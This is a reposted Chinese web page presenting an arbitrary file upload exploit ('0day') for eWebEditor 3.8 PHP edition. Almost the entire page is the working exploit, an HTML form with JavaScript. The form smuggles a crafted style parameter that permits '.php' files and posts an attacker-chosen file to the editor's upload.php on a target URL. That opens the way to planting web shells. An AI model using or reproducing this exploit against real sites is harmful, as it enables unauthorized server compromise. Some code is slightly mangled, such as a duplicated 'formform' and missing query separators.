ewebeditor(PHP版) Ver 3.8 本任意文件上传0day

2011-11-14 8:16:04 来源:网络转载 浏览:235
ewebeditor(PHP版) Ver 3.8 本任意文件上传0day
XML/HTML代码
<title>eWebeditoR3.8 for php任意文件上EXP</title>  
  
<form action=”" method=post enctype=”multipart/form-data”>  
<INPUT TYPE=”hidden” name=”MAX_FILE_SIZE” value=”512000″>  
URL:<input type=text name=url value=”http://www.sitedirsec.com/ewebeditor/” size=100><br>  
<INPUT TYPE=”hidden” name=”aStyle[12]” value=”toby57|||gray|||red|||../uploadfile /|||55   
0|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|w   
av|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif   
|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0   
|||0|||||||||1|||0|||Office|||1|||zh- cn|||0|||500|||300|||0|||…|||FF00   
00|||12|||宋 体||||||0|||jpg|jpeg|||300|||FFFFFF|||1″>  
file:<input type=file name=”uploadfile”><br>  
<input type=button value=submit onclick=fsubmit()>  
</form><br>  
<script>  
function fsubmit(){   
form = document.forms[0];   
formform.action = form.url.value+”php/upload.php?action=savetype=FILEstyle=toby57language=en”;   
alert(form.action);   
form.submit();   
}   
</script> 
(0)
(0)